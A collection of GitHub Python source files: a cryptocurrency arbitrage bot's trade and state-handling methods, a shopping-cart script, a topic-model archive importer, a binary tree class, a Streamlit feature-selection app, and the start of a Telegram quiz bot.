.set_h_to_e1_max(num_to_decimal(self._config.h_to_e1_max))\n .set_h_to_e2_max(num_to_decimal(self._config.h_to_e2_max))\n .set_max_trade_size(num_to_decimal(self._config.max_trade_size))\n .set_spread_min(num_to_decimal(self._config.spread_min))\n .set_vol_min(num_to_decimal(self._config.vol_min))\n .set_manager(self)\n .build()\n )\n\n def __setup_dry_run_exchanges(self, resume_id):\n \"\"\"Sets up DryRunExchanges which emulate Exchanges. Trades, wallet\n balances, other exchange-related state is then recorded.\n\n Args:\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n\n Returns:\n (tuple(DryRunExchange, DryRunExchange)): The DryRunExchanges for\n E1 and E2 respectively.\n \"\"\"\n if resume_id:\n dry_e1 = self._stat_tracker.dry_run_e1\n dry_e2 = self._stat_tracker.dry_run_e2\n else:\n e1_base, e1_quote = split_symbol(self._config.exchange1_pair)\n e2_base, e2_quote = split_symbol(self._config.exchange2_pair)\n exchange1 = self._config.exchange1\n exchange2 = self._config.exchange2\n e1_base_balance = self._config.dryrun_e1_base\n e1_quote_balance = self._config.dryrun_e1_quote\n e2_base_balance = self._config.dryrun_e2_base\n e2_quote_balance = self._config.dryrun_e2_quote\n dry_e1 = DryRunExchange(exchange1, e1_base, e1_quote,\n e1_base_balance, e1_quote_balance)\n dry_e2 = DryRunExchange(exchange2, e2_base, e2_quote,\n e2_base_balance, e2_quote_balance)\n return dry_e1, dry_e2\n\n\n def __setup_forex(self):\n \"\"\"Sets up any forex services for fiat conversion, if necessary.\"\"\"\n # Bot considers stablecoin (USDT - Tether) prices as roughly equivalent\n # to USD fiat.\n for trader in (self.trader1, self.trader2):\n if ((trader.quote in FIAT_SYMBOLS)\n and (trader.quote != 'USD')\n and (trader.quote != 'USDT')):\n logging.info(\"Set fiat conversion to USD as necessary for: {}\"\n \" with quote: {}\".format(trader.exchange_name,\n trader.quote))\n trader.conversion_needed = True\n self.__update_forex(trader)\n # TODO: Adjust interval once real-time forex implemented.\n schedule.every().hour.do(self.__update_forex, trader)\n\n def __setup_stat_tracker(self, resume_id=None):\n \"\"\"Sets up the bot's StatTracker.\n\n Used for internal tracking and also for persisting simple statistics\n into the database for reporting and analysis.\n\n If resuming a bot, simply logs and returns without any additional\n setup.\n\n Args:\n resume_id (str, optional): The resume id used when resuming a run.\n Defaults to None.\n \"\"\"\n new_stat_tracker_id = str(uuid.uuid4())\n if resume_id:\n if self._config.use_test_api:\n fancy_log(\"Resumed bot running against TEST Exchange APIs.\")\n else:\n fancy_log(\"Resumed bot running against LIVE Exchange APIs.\")\n\n if self._config.dryrun:\n fancy_log(\n \"Resumed - DRY RUN mode. Trades will NOT execute on actual \"\n \"exchanges.\")\n return\n else:\n if self._config.dryrun:\n fancy_log(\n \"DRY RUN mode initiated. Trades will NOT execute on actual\"\n \" exchanges.\")\n\n self._stat_tracker = FCFStatTracker(\n new_id=new_stat_tracker_id,\n e1_trader=self.trader1,\n e2_trader=self.trader2)\n\n row_data = {\n 'id': new_stat_tracker_id,\n 'autotrageur_config_id': self._config.id,\n 'autotrageur_config_start_timestamp': self._config.start_timestamp,\n 'autotrageur_stop_timestamp': None,\n 'e1_start_bal_base': self.trader1.base_bal,\n 'e1_close_bal_base': self.trader1.base_bal,\n 'e2_start_bal_base': self.trader2.base_bal,\n 'e2_close_bal_base': self.trader2.base_bal,\n 'e1_start_bal_quote': self.trader1.quote_bal,\n 'e1_close_bal_quote': self.trader1.quote_bal,\n 'e2_start_bal_quote': self.trader2.quote_bal,\n 'e2_close_bal_quote': self.trader2.quote_bal,\n 'num_fatal_errors': 0,\n 'trade_count': 0\n }\n stat_tracker_row_obj = InsertRowObject(\n FCF_MEASURES_TABLE,\n row_data,\n (FCF_MEASURES_PRIM_KEY_ID,))\n db_handler.insert_row(stat_tracker_row_obj)\n db_handler.commit_all()\n\n def __setup_traders(self, exchange_key_map, resume_id):\n \"\"\"Sets up the Traders to interface with exchanges.\n\n Args:\n exchange_key_map (dict): A map containing authentication\n information necessary to connect with the exchange APIs.\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n\n Raises:\n AutotrageurAuthenticationError: Raised when given incorrect\n credentials or exchange unavailable when attempting to\n communicate through an exchange's API.\n \"\"\"\n # TODO: Looks suitable for a design pattern here to create the Traders\n # as their creation is complex enough.\n\n # Extract the pairs.\n e1_base, e1_quote = split_symbol(self._config.exchange1_pair)\n e2_base, e2_quote = split_symbol(self._config.exchange2_pair)\n\n exchange1 = self._config.exchange1\n exchange2 = self._config.exchange2\n\n # Get exchange configuration settings.\n exchange1_configs = {\n \"nonce\": ccxt.Exchange.milliseconds\n }\n exchange2_configs = {\n \"nonce\": ccxt.Exchange.milliseconds\n }\n\n if exchange_key_map:\n exchange1_configs['apiKey'] = (\n exchange_key_map[exchange1][API_KEY])\n exchange1_configs['secret'] = (\n exchange_key_map[exchange1][API_SECRET])\n exchange1_configs['password'] = (\n exchange_key_map[exchange1][PASSWORD])\n exchange2_configs['apiKey'] = (\n exchange_key_map[exchange2][API_KEY])\n exchange2_configs['secret'] = (\n exchange_key_map[exchange2][API_SECRET])\n exchange2_configs['password'] = (\n exchange_key_map[exchange2][PASSWORD])\n\n # Set up DryRunExchanges.\n if self._config.dryrun:\n dry_e1, dry_e2 = self.__setup_dry_run_exchanges(resume_id)\n else:\n dry_e1 = None\n dry_e2 = None\n\n self.trader1 = CCXTTrader(\n e1_base,\n e1_quote,\n exchange1,\n 'e1',\n num_to_decimal(self._config.slippage),\n exchange1_configs,\n dry_e1)\n self.trader2 = CCXTTrader(\n e2_base,\n e2_quote,\n exchange2,\n 'e2',\n num_to_decimal(self._config.slippage),\n exchange2_configs,\n dry_e2)\n\n # Set to run against test API, if applicable.\n if not self._config.use_test_api:\n fancy_log(\"Starting bot against LIVE exchange APIs.\")\n self.is_test_run = False\n else:\n fancy_log(\"Starting bot against TEST exchange APIs.\")\n self.trader1.connect_test_api()\n self.trader2.connect_test_api()\n self.is_test_run = True\n\n # Load the available markets for the exchange.\n self.trader1.load_markets()\n self.trader2.load_markets()\n\n try:\n # Dry run uses balances set in the configuration files.\n self.trader1.update_wallet_balances()\n self.trader2.update_wallet_balances()\n except (ccxt.AuthenticationError, ccxt.ExchangeNotAvailable) as auth_error:\n logging.error(auth_error)\n raise AutotrageurAuthenticationError(auth_error)\n\n def __verify_sold_amount(\n self, bought_amount, sell_trader, buy_response, sell_response):\n \"\"\"Ensure that the sold amount is within tolerance.\n\n Args:\n bought_amount (Decimal): The base amount bought.\n sell_trader (CCXTTrader): The sell side trader.\n buy_response (dict): The buy response.\n sell_response (dict): The sell response.\n\n Raises:\n IncompleteArbitrageError: If the sold amount is not within\n the prescribed tolerance.\n \"\"\"\n rounded_sell_amount = sell_trader.round_exchange_precision(\n bought_amount)\n amount_precision = sell_trader.get_amount_precision()\n difference = rounded_sell_amount - sell_response['pre_fee_base']\n\n if amount_precision is None:\n # Exchange has arbitrary precision.\n tolerance = ZERO\n else:\n tolerance = TEN ** num_to_decimal(-amount_precision)\n\n if abs(difference) > tolerance:\n msg = (\"The purchased base amount does not match with \"\n \"the sold amount. Normal execution has \"\n \"terminated.\\nBought amount: {}\\n, Expected \"\n \"sell amount: {}\\nSold amount:\"\n \" {}\\n\\nBuy results:\\n\\n{}\\n\\nSell results:\\n\\n\"\n \"{}\\n\").format(\n bought_amount,\n rounded_sell_amount,\n sell_response['pre_fee_base'],\n pprint.pformat(buy_response),\n pprint.pformat(sell_response))\n\n raise IncompleteArbitrageError(msg)\n\n # @Override\n def _alert(self, subject):\n \"\"\"Last ditch effort to alert user on operation failure.\n\n Args:\n subject (str): The subject/topic for the alert.\n \"\"\"\n alert_error = False\n try:\n self._send_email(subject, traceback.format_exc())\n except Exception as exc:\n alert_error = True\n logging.debug(\"An error occurred trying to send an email.\")\n logging.error(exc, exc_info=True)\n finally:\n try:\n self.twilio_client.phone(\n [subject, DEFAULT_PHONE_MESSAGE],\n self.twilio_config[TWILIO_RECIPIENT_NUMBERS],\n self.twilio_config[TWILIO_SENDER_NUMBER],\n is_mock_call=self._config.dryrun or self.is_test_run)\n except Exception as exc:\n alert_error = True\n logging.debug(\"An error occurred trying to phone with twilio.\")\n logging.error(exc, exc_info=True)\n\n if alert_error:\n raise FCFAlertError(\"One or more methods of communication have\"\n \" failed. Check the logs for more detail.\")\n\n # @Override\n def _clean_up(self):\n \"\"\"Cleans up the state of the autotrageur before performing next\n actions which may be harmed by previous state.\"\"\"\n self._strategy.clean_up()\n\n # @Override\n def _execute_trade(self):\n \"\"\"Execute the arbitrage.\"\"\"\n buy_response = None\n sell_response = None\n trade_metadata = self._strategy.get_trade_data()\n\n if self._config.dryrun:\n logging.debug(\"**Dry run - begin fake execution\")\n buy_response = arbseeker.execute_buy(\n trade_metadata.buy_trader,\n trade_metadata.buy_price)\n self._stat_tracker.trade_count += 1\n\n executed_amount = buy_response['post_fee_base']\n sell_response = arbseeker.execute_sell(\n trade_metadata.sell_trader,\n trade_metadata.sell_price,\n executed_amount)\n self._stat_tracker.trade_count += 1\n\n self._strategy.finalize_trade(buy_response, sell_response)\n self._stat_tracker.log_balances()\n self.__persist_trade_data(\n buy_response, sell_response, trade_metadata)\n logging.debug(\"**Dry run - end fake execution\")\n else:\n try:\n buy_response = arbseeker.execute_buy(\n trade_metadata.buy_trader,\n trade_metadata.buy_price)\n bought_amount = buy_response['post_fee_base']\n except Exception as exc:\n self._send_email(\"BUY ERROR ALERT - CONTINUING\", repr(exc))\n logging.error(exc, exc_info=True)\n self._strategy.strategy_state = self.checkpoint.strategy_state\n else:\n self._stat_tracker.trade_count += 1\n\n # If an exception is thrown, we want the program to stop on the\n # second trade.\n try:\n sell_response = arbseeker.execute_sell(\n trade_metadata.sell_trader,\n trade_metadata.sell_price,\n bought_amount)\n self.__verify_sold_amount(\n bought_amount,\n trade_metadata.sell_trader,\n buy_response,\n sell_response)\n except Exception as exc:\n self._send_email(\"SELL ERROR ALERT - ABORT\", repr(exc))\n logging.error(exc, exc_info=True)\n raise\n else:\n self._stat_tracker.trade_count += 1\n self._strategy.finalize_trade(buy_response, sell_response)\n self._send_email(\n \"TRADE SUMMARY\",\n \"Buy results:\\n\\n{}\\n\\nSell results:\\n\\n{}\\n\".format(\n pprint.pformat(buy_response),\n pprint.pformat(sell_response)))\n finally:\n self.__persist_trade_data(\n buy_response, sell_response, trade_metadata)\n\n # @Override\n def _export_state(self):\n \"\"\"Exports the state of the autotrageur to a database.\n\n NOTE: This method is only called when the fcf bot is stops due to a\n fatal error or if it is killed manually.\"\"\"\n logging.debug(\"#### Exporting bot's current state\")\n\n # UPDATE the fcf_measures table with updated stats.\n raw_update_result = db_handler.execute_parametrized_query(\n \"UPDATE fcf_measures SET \"\n \"autotrageur_stop_timestamp = %s, \"\n \"e1_close_bal_base = %s, \"\n \"e2_close_bal_base = %s, \"\n \"e1_close_bal_quote = %s, \"\n \"e2_close_bal_quote = %s, \"\n \"num_fatal_errors = num_fatal_errors + 1, \"\n \"trade_count = %s \"\n \"WHERE id = %s;\",\n (int(time.time()),\n self._stat_tracker.e1.base_bal,\n self._stat_tracker.e2.base_bal,\n self._stat_tracker.e1.quote_bal,\n self._stat_tracker.e2.quote_bal,\n self._stat_tracker.trade_count,\n self._stat_tracker.id))\n\n logging.debug(\"UPDATE fcf_measures affected rows: {}\".format(\n raw_update_result))\n\n # Register copyreg.pickle with Checkpoint object and helper function\n # for better backwards-compatibility in pickling.\n # (See 'fcf_checkpoint_utils' module for more details)\n copyreg.pickle(FCFCheckpoint, pickle_fcf_checkpoint)\n\n # Detach the Traders from StatTracker and attach it to the Checkpoint.\n self._stat_tracker.detach_traders()\n self.checkpoint.stat_tracker = self._stat_tracker\n\n # The generated ID can be used as the `resume_id` to resume the bot\n # from the saved state.\n fcf_state_map = {\n 'id': str(uuid.uuid4()),\n 'autotrageur_config_id': self._config.id,\n 'autotrageur_config_start_timestamp': self._config.start_timestamp,\n 'state': pickle.dumps(self.checkpoint)\n }\n logging.debug(\n \"#### The exported checkpoint object is: {0!r}\".format(\n self.checkpoint))\n logging.info(\"Exported with resume id: {}\".format(\n fcf_state_map[FCF_STATE_PRIM_KEY_ID]))\n fcf_state_row_obj = InsertRowObject(\n FCF_STATE_TABLE,\n fcf_state_map,\n (FCF_STATE_PRIM_KEY_ID,))\n db_handler.insert_row(fcf_state_row_obj)\n db_handler.commit_all()\n\n # Reattach the Traders for further use in current bot run.\n self._stat_tracker.attach_traders(self.trader1, self.trader2)\n\n # @Override\n def _final_log(self):\n \"\"\"Produces a final log and console output during the finality of the\n bot.\"\"\"\n self._stat_tracker.log_all()\n\n # @Override\n def _import_state(self, resume_id):\n \"\"\"Imports the state of a previous autotrageur run.\n\n Sets the FCFCheckpoint to be a snapshot of the previous autotrageur's\n state.\n\n Args:\n resume_id (str): The unique ID used to resume the bot from a\n previous run.\n \"\"\"\n logging.debug(\"#### Importing bot's previous state\")\n raw_result = db_handler.execute_parametrized_query(\n \"SELECT state FROM fcf_state where id = %s;\",\n (resume_id,))\n\n # The raw result comes back as a list of tuples. We expect only\n # one result as the `autotrageur_resume_id` is unique per\n # export.\n previous_checkpoint = pickle.loads(raw_result[0][0])\n\n if not isinstance(previous_checkpoint, FCFCheckpoint):\n raise IncorrectStateObjectTypeError(\n \"FCFCheckpoint is the required type. {} type was given.\"\n .format(type(previous_checkpoint)))\n\n self.checkpoint = previous_checkpoint\n\n # @Override\n def _poll_opportunity(self):\n \"\"\"Poll exchanges for arbitrage opportunity.\n\n Returns:\n bool: Whether there is an opportunity.\n \"\"\"\n return self._strategy.poll_opportunity()\n\n # @Override\n def _post_setup(self, arguments):\n \"\"\"Initializes any additional components which rely on the core\n components.\n\n Components initialized:\n - Traders to interface with exchange APIs (parses the keyfile for\n relevant authentication first)\n - BalanceChecker\n - Twilio Client\n - Forex Client\n\n Other responsibilities:\n - Persists Configuration and Forex in the database.\n\n NOTE: The order of these calls matters. For example, the StatTracker\n relies on instantiated Traders, and a persisted Configuration entry.\n\n Args:\n arguments (dict): Map of the arguments passed to the program.\n \"\"\"\n super()._post_setup(arguments)\n\n # Persist the configuration.\n self.__persist_config()\n\n # Parse keyfile into a dict.\n exchange_key_map = self.__parse_keyfile(\n arguments['KEYFILE'], arguments['--pi_mode'])\n\n # Set up the Traders for interfacing with exchange APIs.\n self.__setup_traders(exchange_key_map, arguments['--resume_id'])\n\n # Initialize StatTracker component and attach it to the Checkpoint.\n self.__setup_stat_tracker(arguments['--resume_id'])\n if arguments['--resume_id']:\n self._stat_tracker.attach_traders(self.trader1, self.trader2)\n\n # Initialize a Balance Checker.\n self.balance_checker = FCFBalanceChecker(\n self.trader1, self.trader2, self._send_email)\n\n # Set up Twilio Client.\n self.__load_twilio(self._config.twilio_cfg_path)\n\n # Set up Forex client.\n self.__setup_forex()\n\n\n def _send_email(self, subject, msg):\n \"\"\"Send email alert to preconfigured emails.\n\n Args:\n subject (str): The subject of the message.\n msg (str): The contents of the email to send out.\n \"\"\"\n send_all_emails(self._config.email_cfg_path, subject, msg)\n\n # @Override\n def _setup(self, arguments):\n \"\"\"Initializes the autotrageur bot for use by setting up core\n components which must be set up before any additional components.\n\n In addition to superclass setup, the following core components are\n initialized:\n - Checkpoint (for state-related variables)\n - Algorithm\n - Dry Run (on resume)\n\n If starting from resume:\n - Import the previous Checkpoint, setting a checkpoint object.\n - Restore any state from the Checkpoint\n Else:\n - Initialize the Checkpoint object with the Configuration\n - Initialize the Algorithm\n\n Args:\n arguments (dict): Map of the arguments passed to the program.\n \"\"\"\n super()._setup(arguments)\n\n resume_id = arguments['--resume_id']\n if resume_id:\n self._import_state(resume_id)\n self._config = self.checkpoint.config\n self._strategy = self.__construct_strategy()\n self.checkpoint.restore_strategy(self._strategy)\n self._stat_tracker = self.checkpoint.stat_tracker\n logging.debug(\n '#### Restored State objects: {0!r}\\n{1!r}\\n{2!r}'.format(\n self._config,\n self._strategy.state,\n self._stat_tracker))\n else:\n # Initialize a Checkpoint object to hold state.\n self.checkpoint = FCFCheckpoint(self._config)\n\n # Set up the Algorithm.\n self._strategy = self.__construct_strategy()\n\n # @Override\n def _wait(self):\n \"\"\"Wait for the specified polling interval.\n\n We use the Autotrageur default unless a chunked trade is in\n progress.\n \"\"\"\n if self._strategy.trade_chunker.trade_completed:\n super()._wait()\n else:\n time.sleep(self._config.poll_wait_short)\n","repo_name":"ronaldlam/Autotrageur","sub_path":"autotrageur/bot/arbitrage/fcf_autotrageur.py","file_name":"fcf_autotrageur.py","file_ext":"py","file_size_in_byte":32460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"38124949651","text":"import os\n\n'''\nSimple shop cart algorithm\n'''\n\nshop_card = []\nwhile True:\n print('Escolha uma opção: ')\n option = int(\n input(f'''\n {1} Inserir\n {2} Apagar\n {3} Listar\n {4} Sair\n ''')\n)\n\n if option == 1:\n os.system('clear')\n\n item = input('Insira o item: ')\n shop_card.append(item)\n\n os.system('clear')\n\n elif option == 2:\n\n try:\n index = int(input('Escolha o inice: \\n'))\n del shop_card[index]\n print(f'O item excluido foi {item}\\n')\n except ValueError:\n print('Somente numeros inteiros')\n except IndexError:\n print('Indice não existe\\n')\n except Exception:\n print('Erro desconhecido')\n\n elif option == 3:\n\n os.system('clear')\n\n for i, value in enumerate(shop_card):\n print(i, value,'\\n')\n\n elif option == 4:\n exit()\n","repo_name":"jorgebarcelos/drafts","sub_path":"app/listas_compras.py","file_name":"listas_compras.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23748376532","text":"from __future__ import print_function\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import input\nfrom builtins import range\n\nfrom codecs import open\nimport os\nimport os.path\nfrom zipfile import ZipFile\n\nimport topicexplorer.config\n\ndef absolutize_config_file(config_file, output_dir):\n config_file = os.path.join(output_dir, config_file)\n\n config = topicexplorer.config.read(config_file)\n\n # path variables\n corpus_file = config.get('main', 'corpus_file')\n corpus_file = os.path.join(output_dir, corpus_file)\n corpus_file = os.path.abspath(corpus_file)\n config.set('main', 'corpus_file', corpus_file)\n\n model_pattern = config.get('main', 'model_pattern')\n model_pattern = os.path.join(output_dir, model_pattern)\n model_pattern = os.path.abspath(model_pattern)\n config.set('main', 'model_pattern', model_pattern)\n \n cluster_path = config.get('main', 'cluster')\n if cluster_path is not None and cluster_path != 'None':\n cluster_path = os.path.join(output_dir, cluster_path)\n cluster_path = os.path.abspath(cluster_path)\n config.set('main', 'cluster', cluster_path)\n \n path = config.get('main', 'path')\n if path is not None and path != 'None':\n path = os.path.join(output_dir, path)\n path = os.path.abspath(path)\n config.set('main', 'path', path)\n \n raw_corpus = config.get('main', 'raw_corpus')\n if raw_corpus is not None and raw_corpus != 'None':\n raw_corpus = os.path.join(output_dir, raw_corpus)\n raw_corpus = os.path.abspath(raw_corpus)\n config.set('main', 'raw_corpus', raw_corpus)\n \n corpus_desc = config.get('main', 'corpus_desc')\n if corpus_desc is not None and corpus_desc != 'None':\n corpus_desc = os.path.join(output_dir, corpus_desc)\n corpus_desc = os.path.abspath(corpus_desc)\n config.set('main', 'corpus_desc', corpus_desc)\n \n htrc_metadata = config.get('www', 'htrc_metadata')\n if htrc_metadata is not None and htrc_metadata != 'None':\n htrc_metadata = os.path.join(output_dir, htrc_metadata)\n htrc_metadata = os.path.abspath(htrc_metadata)\n config.set('www', 'htrc_metadata', htrc_metadata)\n\n with open(config_file, 'w', encoding='utf8') as configfile:\n config.write(configfile)\n\n\ndef populate_parser(parser):\n parser.add_argument('tezfile', help='TEZ archive file')\n parser.add_argument('-o', '--output', default='.', required=False,\n help=\"output directory\")\n return parser\n\n\ndef main(args):\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n elif not os.path.isdir(args.output):\n raise IOError(\"Invalid path: must be a directory.\")\n \n with ZipFile(args.tezfile) as tezfile:\n print(\"Extracting files...\")\n tezfile.extractall(args.output)\n \n with ZipFile(args.tezfile) as tezfile:\n files = tezfile.namelist()\n config_candidates = [f for f in files if f.endswith('.ini')]\n if len(config_candidates) > 1:\n raise IOError(\"Multiple config files in tez archive\")\n elif not config_candidates:\n raise IOError(\"No config file in tez archive\")\n else:\n absolutize_config_file(config_candidates[0], args.output)\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n populate_parser(parser)\n args = parser.parse_args()\n\n main(args)\n","repo_name":"inpho/topic-explorer","sub_path":"topicexplorer/tezimport.py","file_name":"tezimport.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"6411746234","text":"class Node:\n\n def __init__(self, data):\n self.left = None\n self.right = None\n self.depth = 0\n self.data = data\n\n# Insert method to create nodes\n def insert(self, data, d=1):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n self.left.depth = d\n else:\n d += 1\n self.left.insert(data, d)\n elif data > self.data:\n if self.right is None:\n self.right = Node(data)\n self.right.depth = d\n else:\n d += 1\n self.right.insert(data, d)\n\n else:\n self.data = data\n\n def remove(self, data):\n if data < self.data:\n if self.left is None:\n print(f'{data} is not found')\n else:\n self.left.remove(data)\n elif data > self.data:\n if self.right is None:\n print(f'{data} is not found')\n else:\n self.right.remove(data)\n else:\n if self.left is None and self.right is None:\n print(f'{self.data} was found for deleting')\n del self.data\n\n\n\n\n # findval method to compare the value with nodes\n def findval(self, lkpval):\n if lkpval < self.data:\n if self.left is None:\n return str(lkpval)+\" is not Found\"\n return self.left.findval(lkpval)\n elif lkpval > self.data:\n if self.right is None:\n return str(lkpval)+\" is not Found\"\n return self.right.findval(lkpval)\n else:\n return str(self.data) + \" is found\"\n\n# Print the tree\n def PrintTree(self):\n if self.right:\n self.right.PrintTree()\n\n for d in range(self.depth):\n print('-', end='')\n\n print(f\"{self.data} ({self.depth})\")\n\n if self.left:\n self.left.PrintTree()\n\n\n\nroot = Node(27)\nroot.insert(14)\nroot.insert(35)\nroot.insert(31)\nroot.insert(10)\nroot.insert(19)\n\nroot.PrintTree()\n\nprint('--------------------')\nroot.remove(10)\nprint('--------------------')\n\nroot.PrintTree()\n\n#\n# print('--------------------')\n# root.remove(19)\n# root.PrintTree()\n#\n# print('--------------------')\n# root.remove(35)\n# root.PrintTree()\n","repo_name":"lipskydan/Binary-Tree","sub_path":"App/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41950326151","text":"import streamlit as st\nimport pandas as pd\nfrom func import FeatureSelector\nfrom charts import *\nfrom models import ModelRunner\nimport warnings\nfrom sklearn.exceptions import DataConversionWarning\n\nimport altair as alt\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, RocCurveDisplay, PrecisionRecallDisplay\nfrom sklearn.metrics import precision_score, recall_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import LinearRegression\nimport seaborn as sns\nfrom sklearn.metrics import classification_report\n\nwarnings.filterwarnings(action='ignore', category=DataConversionWarning)\n\ndf = None # global dataframe; if it is not uploaded, it is None.\nst.title('Feature Selection')\nst.sidebar.title('This is the sidebar')\nst.sidebar.markdown('Choose an option!!')\n\ndef main():\n global df\n #Title\n#def main():\n \nif __name__ == \"__main__\":\n main()\n\n@st.cache_data(persist= True)\ndef load():\n data= pd.read_csv(\"data/Updated_Subset_1.csv\")\n# label= LabelEncoder()\n# for i in data.columns:\n# data[i] = label.fit_transform(data[i])\n return data\ndf = load()\n\ndf = df.drop(columns=[\"sub_id\"])\n\n\n@st.cache_data(persist=True)\ndef split(df):\n y = df.label\n x = df.drop(columns=[\"label\"])\n x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.3, random_state=0)\n return x_train, x_test, y_train, y_test\nx_train, x_test, y_train, y_test = split(df)\n\ndef plot_metrics(metrics_list):\n if \"Confusion Matrix\" in metrics_list:\n st.subheader(\"Confusion Matrix\")\n ConfusionMatrixDisplay.from_estimator(model, x_test, y_test, display_labels=class_names)\n st.pyplot()\n #cm=confusion_matrix(y_test, y_pred)\n #ConfusionMatrixDisplay(cm,model.classes_).plot()\n if \"ROC Curve\" in metrics_list:\n st.subheader(\"ROC Curve\")\n RocCurveDisplay.from_estimator(model, x_test, y_test)\n st.pyplot()\n if \"Precision-Recall Curve\" in metrics_list:\n st.subheader(\"Precision-Recall Curve\")\n PrecisionRecallDisplay.from_estimator(model, x_test, y_test)\n st.pyplot()\nclass_names = [\"walk\", \"run\"]\n\ntab1, tab2, tab3 = st.tabs(['Feature Selection', 'Dimension Reduction', 'Regression'])\nwith tab1:\n if st.sidebar.checkbox(\"Display data\", False):\n st.subheader(\"Show mHealth dataset\")\n st.write(df)\n if df is not None:\n #display dataframe\n #st.write(df)\n #select target variable\n target = st.selectbox(\"Select Target Feature\",df.columns)\n #select feature selection method\n selector = st.radio(label=\"Selection Method\",options=[\"SelectKBest\",\"RFE\",\"SelectFromModel\"])\n F = FeatureSelector(df,target)\n univariate,ref,sfm,problem = F.get_result_dictionaries()\n #chart\n if selector == \"SelectKBest\":\n fig = barchart(univariate[\"scores\"], univariate[\"feature_names\"], \"Feature Scores acc to SelectKBest\")\n elif selector == \"RFE\":\n fig = barchart(ref[\"ranking\"], ref[\"feature_names\"], \"Ranking acc to RFE; (Lower better)\")\n elif selector == \"SelectFromModel\":\n fig = barchart(sfm[\"scores\"], sfm[\"feature_names\"], \"Feature Scores acc to SelectFromModel\")\n st.pyplot(fig)\n #select k number of features to proceed\n k = st.number_input(\"Number of Feature to proceed (k): \", min_value=0, max_value= len(df.columns) - 1)\n if problem == \"regression\":\n model = st.selectbox(\"ML Method\",[\"Linear Regression\",\"XGBoost\"])\n else:\n model = st.selectbox(\"ML Method\",[\"Logistic Regression\",\"Decision Tree\"])\n #when k is determined \n if k > 0:\n #get last X,y according to feature selection\n X,_,temp,col_types,_ = F.extract_x_y() \n y = df[target].values.reshape(-1,1)\n #feature set\n if selector == \"SelectKBest\":\n X = F.univariate_feature_selection(X,y,temp,k)[\"X\"]\n elif selector == \"RFE\":\n X = F.ref_feature_selection(X,y,temp,col_types,k)[\"X\"]\n elif selector == \"SelectFromModel\":\n X = F.sfm_feature_selection(X,y,temp,col_types,k)[\"X\"]\n #run models\n M = ModelRunner(model,X,y,problem)\n score = M.runner()\n #display score\n st.write(\"Score of Model: {}\".format(score))\n\nwith tab2:\n\n st.subheader(\"Select a model\")\n model = st.selectbox(\"Model\", (\"none\", \"K-Means Clustering\"))\n st.write(f\"Model: {model}\")\n\n # If K-Means clustering is selected, display a slider for selecting the number of clusters\n if model == \"K-Means Clustering\":\n \n #data_k= pd.read_csv(\"data/Updated_Subset_1.csv\")\n data_k = df.drop(columns=[\"label\"])\n st.write(\"Select the number of clusters:\")\n n_clusters = st.slider(\"Number of clusters\", min_value=2, max_value=10)\n\n # Apply K-Means clustering to the data\n kmeans = KMeans(n_clusters=n_clusters, n_init=\"auto\")\n kmeans.fit(data_k)\n groups = kmeans.labels_\n\n # Display the clustering results in a scatter plot\n pca = PCA(n_components=2)\n principal_components = pca.fit_transform(data_k)\n principal_df = pd.DataFrame(data=principal_components, columns=['PC1', 'PC2'])\n principal_df['group'] = groups\n # st.write(sns.scatterplot(data=principal_df, x='PC1', y='PC2', hue='label'))\n # scatter = sns.scatterplot(data=principal_df, x='PC1', y='PC2', hue='group')\n # st.write(scatter)\n chart = alt.Chart(principal_df).mark_circle(size=60).encode(\n x='PC1:Q',\n y='PC2:Q',\n color='group'\n ).properties(\n width=600,\n height=600\n )\n st.write('K-Mean Cluster')\n st.write(chart)\n\nwith tab3:\n #data_reg = pd.read_csv(\"data/Updated_Subset_1.csv\")\n data_reg = df.drop(columns=[\"label\"])\n st.write(\"Select the dependent variable:\")\n target_var = st.selectbox(\"Target Variable\", list(data_reg.columns))\n\n st.write(\"Select the independent variables:\")\n independent_vars = st.multiselect(\"Independent Variables\", list(data_reg.columns), default=['ekg_1'])\n\n # Train a Multiple Regression model and display the results\n X = data_reg[independent_vars]\n y = data_reg[target_var]\n reg = LinearRegression().fit(X, y)\n st.write(\"R-squared:\", reg.score(X, y))\n\n\nmain()\n\n\n","repo_name":"rishipalb/mHealthData","sub_path":"pages/03_Feature_Selection.py","file_name":"03_Feature_Selection.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28837945227","text":"from aiogram import types, Dispatcher\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton, ParseMode\nfrom config import bot\n\n\nasync def quiz_2(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_2 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_2')\n markup.add(button_call_2)\n\n question = \"Какая основная цель эзотерических языков программирования?\"\n answers = [\n \"Исследования границ возможностей разработки языков программирования\",\n \"Создание программ путем манипулирования визуальными объектами и эзотерическими формами\",\n \"Таких языков программирования не существует\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Экзорцизм? нет, речь про Эзотеризм»\",\n 